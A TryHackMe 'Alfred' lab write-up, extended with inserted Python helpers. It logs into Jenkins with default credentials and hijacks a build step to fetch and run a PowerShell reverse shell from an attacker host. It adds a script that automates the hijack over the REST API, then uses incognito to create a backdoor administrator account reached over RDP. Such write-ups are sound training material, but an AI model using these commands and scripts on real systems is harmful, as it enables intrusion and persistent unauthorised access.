TryHackMe Alfred writeup

Alfred is the second machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

Enumeration

The output of the nmap scan:

nmap -sC -sV 10.10.0.34

80/tcp   open  Microsoft IIS httpd 7.5
3389/tcp open  ssl/ms-wbt-server?
8080/tcp open  Jetty 9.4.z-SNAPSHOT

Port 8080 serves a Jenkins login page. Jenkins has no fixed default credential: a fresh install generates a one-time initial admin password during setup, so when a login page is exposed the first thing to check is the usual weak pairs (admin:admin, admin:password, jenkins:jenkins). admin:admin does the trick this time.


Exploitation

A few words about Jenkins before we move on:

Jenkins – an open source automation server which enables developers around the world to reliably build, test, and deploy their software.

From the attacker’s perspective this is a goldmine. First, every build step is arbitrary command execution on the build host, running as the account the Jenkins service runs under. Second, existing jobs, build logs and the credentials store often contain secrets that are valuable on their own.

We can see that Jenkins already has a job, named, well, project, with at least one completed build.

Navigate to the configurations of the project:

http://10.10.0.34:8080/job/project/configure

We are looking for the Build section. The job has a single “Execute Windows batch command” build step (cmd.exe, not bash) that simply runs whoami. Let’s replace that command with one that downloads a reverse shell from our Kali Linux machine and runs it.

A common way to do that on a Windows box is a PowerShell reverse shell such as Invoke-PowerShellTcp.ps1 from nishang.

The script only defines the function, so append a call to it at the end of Invoke-PowerShellTcp.ps1; that way the shell starts as soon as the script is loaded:

Invoke-PowerShellTcp -Reverse -IPAddress 10.11.19.53 -Port 1337

Serve the file over HTTP from the directory it sits in (port 80 needs root, hence sudo):

sudo python3 -m http.server 80

On an older Kali with Python 2 the equivalent is: sudo python -m SimpleHTTPServer 80

Prepare a listener on port 1337 with nc (root is not required for a port above 1024, but it does no harm):

sudo nc -nlvp 1337

We are done with preparations on the Kali Linux side, let’s modify the Build command in Jenkins now. Replace the whoami with the following:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.19.53/Invoke-PowerShellTcp.ps1')

Hit Build Now and wait a moment. Jenkins runs the batch step, which downloads and executes your reverse shell under the account the Jenkins service runs as, here the user bruce. The build will stay “in progress” for as long as the shell is connected, because the batch step waits for powershell to exit; that is expected and does not affect the shell.
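The same job hijack can be driven over the Jenkins REST API instead of the web UI, which is handy when you want to script it or the UI is slow. The following is an added example, not code from the original write-up or from the Jenkins project. It assumes the values used above (Jenkins at 10.10.0.34:8080 with admin:admin, a freestyle job named project whose only build step is an “Execute Windows batch command”, and a Kali web server at 10.11.19.53 serving Invoke-PowerShellTcp.ps1); the helper names are mine.

```python
"""Added example: hijack a Jenkins freestyle job's batch build step over the REST API.

Assumed (not stated by the write-up beyond the values themselves): Jenkins reachable at
JENKINS_URL with ADMIN_USER/ADMIN_PASS, a job JOB with an 'Execute Windows batch
command' step, and an attacker web server at ATTACKER_IP serving the nishang script.
"""
import base64
import json
import re
import urllib.request
import xml.etree.ElementTree as ET

JENKINS_URL = "http://10.10.0.34:8080"   # assumed target
JOB = "project"
ADMIN_USER, ADMIN_PASS = "admin", "admin"
ATTACKER_IP = "10.11.19.53"              # assumed Kali address


def download_cradle(attacker_ip, script="Invoke-PowerShellTcp.ps1"):
    """cmd.exe line that pulls the nishang script over HTTP and runs it in memory."""
    return ("powershell iex (New-Object Net.WebClient).DownloadString("
            f"'http://{attacker_ip}/{script}')")


def replace_batch_command(config_xml, new_cmd):
    """Return config.xml with every Windows batch step's <command> replaced by new_cmd.

    Jenkins serialises the step as
    <builders><hudson.tasks.BatchFile><command>...</command></hudson.tasks.BatchFile></builders>.
    Jenkins writes an XML 1.1 declaration; strip it so the stdlib parser never trips on it.
    """
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_xml)
    root = ET.fromstring(body)
    steps = root.findall("./builders/hudson.tasks.BatchFile")
    if not steps:
        raise ValueError("job has no 'Execute Windows batch command' build step")
    for step in steps:
        step.find("command").text = new_cmd
    return ET.tostring(root, encoding="unicode")


def jenkins_opener(user, password):
    """Basic-auth opener that keeps the session cookie; Jenkins ties its CSRF crumb to it."""
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    opener.addheaders = [("Authorization", f"Basic {token}")]
    return opener


def get_crumb(opener):
    """Fetch the CSRF crumb header name and value; Jenkins requires it on every POST."""
    with opener.open(f"{JENKINS_URL}/crumbIssuer/api/json") as resp:
        data = json.load(resp)
    return data["crumbRequestField"], data["crumb"]


def hijack_build(opener):
    """Rewrite the job's batch step to the download cradle and queue a build."""
    cfg_url = f"{JENKINS_URL}/job/{JOB}/config.xml"
    with opener.open(cfg_url) as resp:
        original = resp.read().decode()
    field, crumb = get_crumb(opener)
    new_cfg = replace_batch_command(original, download_cradle(ATTACKER_IP))
    req = urllib.request.Request(cfg_url, data=new_cfg.encode(), method="POST",
                                 headers={field: crumb, "Content-Type": "application/xml"})
    opener.open(req).close()
    req = urllib.request.Request(f"{JENKINS_URL}/job/{JOB}/build", data=b"",
                                 method="POST", headers={field: crumb})
    with opener.open(req) as resp:
        return resp.status        # Jenkins answers 201 Created when the build is queued


if __name__ == "__main__":
    print("build queued, HTTP", hijack_build(jenkins_opener(ADMIN_USER, ADMIN_PASS)))
```

Start the listener and the web server first, then run the script; the shell arrives as soon as the queued build starts. Because the edit goes through config.xml, the original whoami step is overwritten, so save the original XML if you want to restore the job afterwards.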


PrivEsc

Let’s check what privileges the user bruce has:

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
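Reading whoami /priv by eye works for four lines, but it is worth having a small triage helper that parses the output and points at the privileges with known escalation paths. The following is an added example, not code from the original write-up; the sample input is the output shown above for bruce, and the mapping from privilege to abuse path is general Windows knowledge of mine, not something the page states.

```python
"""Added example: parse 'whoami /priv' output and flag abusable privileges.

The sample text is the output shown for bruce above; ABUSABLE is my own selection of
privileges with well-known local privilege escalation paths, not an exhaustive list.
"""
import re

ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate a client token (incognito, Potato family) to reach SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process (same Potato family)",
    "SeDebugPrivilege": "open any process, e.g. LSASS or a SYSTEM process, to dump or inject",
    "SeBackupPrivilege": "read any file regardless of ACL, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant yourself access",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# One privilege row: name, free-text description, then Enabled/Disabled at the end.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output):
    """Map privilege name -> 'Enabled' / 'Disabled' from raw 'whoami /priv' text."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def triage(privs):
    """Return (privilege, why it matters) for every held privilege in ABUSABLE.

    Disabled privileges are reported too: a process can re-enable any privilege
    its token holds with AdjustTokenPrivileges, so 'Disabled' is not a mitigation.
    """
    return [(name, ABUSABLE[name]) for name in privs if name in ABUSABLE]


# Constructed sample: the whoami /priv output shown for bruce above.
SAMPLE = """PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""

if __name__ == "__main__":
    for name, why in triage(parse_whoami_priv(SAMPLE)):
        print(f"{name}: {why}")
```

On bruce’s token the helper flags two entries, SeImpersonatePrivilege (the one used below) and SeDebugPrivilege, which the write-up does not use but which on its own would let bruce open and inject into a SYSTEM process.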

The official guide covers only the way to do it with Metasploit, but of course, you can do the same without it.

SeImpersonatePrivilege allows a process to impersonate the security context (the access token) of a client that has authenticated to it. Service accounts commonly hold it, and if a token belonging to NT AUTHORITY\SYSTEM can be obtained, the process can act as SYSTEM; that is what incognito’s token handling relies on. The official guide uses the incognito module for Metasploit, but incognito is also available as a stand-alone binary. Transfer incognito.exe to the machine any way you prefer. If you don’t have one, you can use this PowerShell one-liner (the Python web server from the previous step can serve the file):

(New-Object System.Net.WebClient).DownloadFile("http://<YOUR_IP>/<FILE_NAME>", "C:\<PATH_TO_THE_FILE><FILE_NAME>")

Once the file is on the box, you can impersonate an NT AUTHORITY\SYSTEM token as the official guide recommends, or you can create a new user with admin rights:

PS C:\users\public\Documents> ./incognito.exe add_user carrotcake SuperSecretPassw0rd123
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user carrotcake to host 127.0.0.1
[+] Successfully added user

PS C:\users\public\Documents> ./incognito.exe add_localgroup_user Administrators carrotcake
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user carrotcake to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group

Here we create a new user carrotcake with the password SuperSecretPassw0rd123 via incognito.exe and then add the account to the local Administrators group. The warning about not running as SYSTEM is expected: incognito can only enumerate the tokens visible to bruce, and the two “[+] Successfully …” lines show that one of them was sufficient for the user-management calls. Keep in mind that creating an account is a loud and persistent change: it leaves user-creation and group-membership events in the Security log and has to be cleaned up at the end of a real engagement.

You can now log in to the box with the new account. RDP is available, since port 3389 is open:

rdesktop -u carrotcake -p SuperSecretPassw0rd123 10.10.0.34

If rdesktop fails to negotiate the connection (it is no longer maintained), xfreerdp usually works: xfreerdp /u:carrotcake /p:SuperSecretPassw0rd123 /v:10.10.0.34

Or you can use the tool Remmina instead of rdesktop. It has a built-in screenshot taker and works much more stably for my taste.


Takeaway

  • You don’t have to always look for a way to exploit the service. Sometimes you just need to use it

  • Understanding the environment can help you to achieve your goals

  • Creating a new user sometimes might be the easiest way to get persistent access to the system